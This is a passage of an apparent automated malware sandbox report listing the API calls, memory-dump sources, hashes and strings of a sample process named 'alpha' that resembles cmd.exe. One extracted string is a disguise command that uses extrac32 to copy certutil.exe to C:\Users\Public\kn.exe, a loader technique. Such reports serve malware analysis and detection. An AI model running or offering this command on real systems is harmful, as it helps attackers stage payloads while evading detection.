                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                          • String ID: @P
                                                                                                          Similarity
                                                                                                          • API ID: memset$BufferConsoleInfoScreen
                                                                                                          Similarity
                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14AA85
                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14AACF
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14AAEC
                                                                                                          • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7AB1498C0), ref: 00007FF7AB14AB39
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7AB1498C0), ref: 00007FF7AB14AB6F
                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7AB1498C0), ref: 00007FF7AB14ABA4
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7AB1498C0), ref: 00007FF7AB14ABCB
                                                                                                          Similarity
                                                                                                          • API ID: CloseDeleteValue$CreateOpen
                                                                                                          • String ID: %s=%s
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmpwcsrchr
                                                                                                          • String ID: COPYCMD
                                                                                                          Similarity
                                                                                                          • API ID: memset$FullNamePathwcsrchr
                                                                                                          Similarity
                                                                                                          • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                          Similarity
                                                                                                          • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                          • String ID: %9d
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID:
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                          • String ID: %5lu
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp
                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: wcschr
                                                                                                          • String ID:
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • _pipe.MSVCRT ref: 00007FF7AB126C1E
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB126CD1
                                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7AB126CFB
                                                                                                          Similarity
                                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                          • String ID:
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                          • String ID:
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: OpenToken$CloseProcessThread
                                                                                                          • String ID:
                                                                                                          APIs
                                                                                                          • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7AB14C59E), ref: 00007FF7AB125879
                                                                                                            • Part of subcall function 00007FF7AB1258D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB125903
                                                                                                            • Part of subcall function 00007FF7AB1258D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB125943
                                                                                                            • Part of subcall function 00007FF7AB1258D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB125956
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValueVersion
                                                                                                          • String ID: %d.%d.%05d.%d
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ErrorFileFindFirstLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2831795651-0
                                                                                                          • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                                          • Instruction ID: 57fb2a336cacc917a4e3515e5997422f7db161589f29658fdc53cd544eb06d33
                                                                                                          • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                                                                          • Instruction Fuzzy Hash: 2CD1D47260A68286E7A9AF28F4406AAB7E0FB4479CF961135DE4D077B8EF3CD444C710
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00007FF7AB127DA1
                                                                                                            • Part of subcall function 00007FF7AB13417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB1341AD
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB127EB7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                          • String ID:
                                                                                                          • API String ID: 168394030-0
                                                                                                          • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                          • Instruction ID: f74c404ebf561aff8f69fefb03325ff00650d055b50c986e4ac7835aa25f1d48
                                                                                                          • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                          • Instruction Fuzzy Hash: 21A10B21B0A64285FB5AAB2DF4902BAA3A1FF8478CF814135D91E476F5FF3DE4458720
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationQueryToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 4239771691-0
                                                                                                          • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                          • Instruction ID: 2b4950cfdda90b17435d033f536c00d8ca78f5003322497429abac51eadf8bf1
                                                                                                          • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                          • Instruction Fuzzy Hash: 41114CB6608781CAEB119B05F4403A9FBA4FB84799F814231DA48037B4EB7CD588CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileInformation$HandleQueryVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 2149833895-0
                                                                                                          • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                          • Instruction ID: 7cb7d99ed07c7c91ed34bee133534eb272f25f3f72c08b0aa5a86242b1fc5b30
                                                                                                          • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                          • Instruction Fuzzy Hash: E01191316097828AEB619B18F4403AAFBA0FB44B5CF814531DA9D42A74DFBCD48CCB10
                                                                                                          APIs
                                                                                                          • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7AB144227), ref: 00007FF7AB148678
                                                                                                          • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF7AB144227), ref: 00007FF7AB1486D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$System$File
                                                                                                          • String ID:
                                                                                                          • API String ID: 2838179519-0
                                                                                                          • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                          • Instruction ID: 34bf963f32bdbb0bfbba0c1fa4a8a801553503298d01afa2b3b54fad76e8b14e
                                                                                                          • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                          • Instruction Fuzzy Hash: 18117056529681C5D7249F29F04013AB770FF9CB09B555122FA8D83774EB3CC542CB29
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • towupper.MSVCRT ref: 00007FF7AB1285D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                          • String ID:
                                                                                                          • API String ID: 3520273530-0
                                                                                                          • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                          • Instruction ID: f7ad4551604b8e0ee8d83930d4741ce5575a6597d9bb735f00781aca3f4fd096
                                                                                                          • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                          • Instruction Fuzzy Hash: 7C61C721A0A202C5F7AA7F2CF144379AAA0FF0575CF824136DA1E562F5FF3DA5958321
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationQueryToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 4239771691-0
                                                                                                          • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                          • Instruction ID: dc1c2ca50e3081627044ee031360954f0edb761462f1b9399163398691d38201
                                                                                                          • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                          • Instruction Fuzzy Hash: AFF030B7704B81CBD7019F68F58849CBB78F744B88795853ACB2903714DB75D9A4CB50
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB1393BB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                          • Instruction ID: 746d9e2c45f7ac18d08ebc9750cc8871755d5dfc041dce6fde68701a52c4bb2c
                                                                                                          • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                          • Instruction Fuzzy Hash: 28B09250E26402D1D60ABB39FC810A452A07B98714FC21471C00F81170EE2C929B8720
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7AB12F52A,00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F8DE
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F8FB
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F951
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F96B
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FA8E
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB12FB14
                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FB2D
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FBEA
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB12F996
                                                                                                            • Part of subcall function 00007FF7AB130010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7AB14849D,?,?,?,00007FF7AB14F0C7), ref: 00007FF7AB130045
                                                                                                            • Part of subcall function 00007FF7AB130010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB14F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB130071
                                                                                                            • Part of subcall function 00007FF7AB130010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB130092
                                                                                                            • Part of subcall function 00007FF7AB130010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB1300A7
                                                                                                            • Part of subcall function 00007FF7AB130010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB130181
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D401
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D41B
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D435
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D480
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                          • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                          • API String ID: 3964947564-518410914
                                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                          • Instruction ID: 01f0b7dc2bddbf7a9127ce499b9c4e6f806935b85e3d70ea7b135fd0036b164c
                                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                          • Instruction Fuzzy Hash: 66026A21A0B602C6EB5ABB29F854278E7A0FF4975CFD24635D90E432B4EF3DA414C661
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$iswspacewcschr
                                                                                                          • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                          • API String ID: 840959033-3627297882
                                                                                                          • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                          • Instruction ID: cbd77aeebffe935650d1445d81cf0e8014d6cf53302a10adf8725e2971626607
                                                                                                          • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                          • Instruction Fuzzy Hash: CCD16A21A0A603C6FA9ABB28F4552B9A7A0BF44B4CFD64035D54E472B5EF3CE5488770
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
